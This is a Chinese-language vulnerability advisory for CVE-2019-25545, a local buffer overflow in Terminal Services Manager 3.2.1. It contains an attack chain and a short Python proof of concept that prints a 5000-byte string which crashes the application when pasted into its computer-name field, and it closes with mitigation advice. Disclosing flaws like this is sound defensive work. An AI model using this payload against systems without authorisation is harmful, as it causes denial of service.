CVE-2019-25545 CVSS 6.2 中危

CVE-2019-25545: Terminal Services Manager 本地缓冲区溢出漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2019-25545

漏洞类型

缓冲区溢出

CVSS评分

6.2 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Terminal Services Manager

漏洞概述

Terminal Services Manager 3.2.1 版本中存在本地缓冲区溢出漏洞。攻击者可以在添加计算机时，向“计算机名称或IP地址”字段输入超长字符串（约5000字节），导致应用程序在访问该服务器条目时崩溃，从而引发拒绝服务。

技术细节

该漏洞源于 Terminal Services Manager 3.2.1 在处理用户输入时未实施有效的边界检查。具体而言，当攻击者尝试添加新计算机时，可以在“计算机名称或IP地址”输入框中填充约5000字节的恶意数据。由于程序内部缓冲区大小有限，该超长字符串覆盖了相邻的内存区域。当后续操作访问该服务器条目时，系统尝试读取被破坏的内存数据，导致应用程序发生未处理的异常并崩溃。此漏洞无需用户交互和认证，攻击者只需具备本地访问权限即可触发拒绝服务，影响系统的可用性。

攻击链分析

STEP 1

访问应用程序

攻击者在本地系统上打开 Terminal Services Manager 3.2.1 应用程序。

STEP 2

添加计算机

攻击者选择添加新计算机（Add Computer）的功能选项。

STEP 3

输入恶意载荷

攻击者在“计算机名称或IP地址”字段中输入约5000字节的超长字符串（例如重复的“A”字符）。

STEP 4

保存配置

攻击者确认并保存该包含超长字符串的服务器条目。

STEP 5

触发崩溃

当应用程序尝试访问、显示或处理该新添加的服务器条目时，触发缓冲区溢出，导致应用程序崩溃（拒绝服务）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import sys

# PoC for CVE-2019-25545
# This script generates the payload to trigger the buffer overflow.
# Usage: Copy the output and paste it into the 'Computer name or IP address' field
# in Terminal Services Manager 3.2.1 when adding a new computer.

def generate_payload():
    # The vulnerability is triggered by a buffer of approximately 5000 bytes
    buffer_size = 5000
    payload = "A" * buffer_size
    return payload

if __name__ == "__main__":
    payload = generate_payload()
    print(f"[+] Generated payload of length: {len(payload)}")
    print("[+] Payload:")
    print(payload)

影响范围

Terminal Services Manager 3.2.1

防御指南

临时缓解措施

建议用户尽快联系供应商获取并安装最新的安全补丁或升级到修复了此漏洞的软件版本。在未修复前，应严格限制对运行该软件的计算机的物理访问和本地用户权限，防止未授权用户利用此漏洞导致服务中断。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表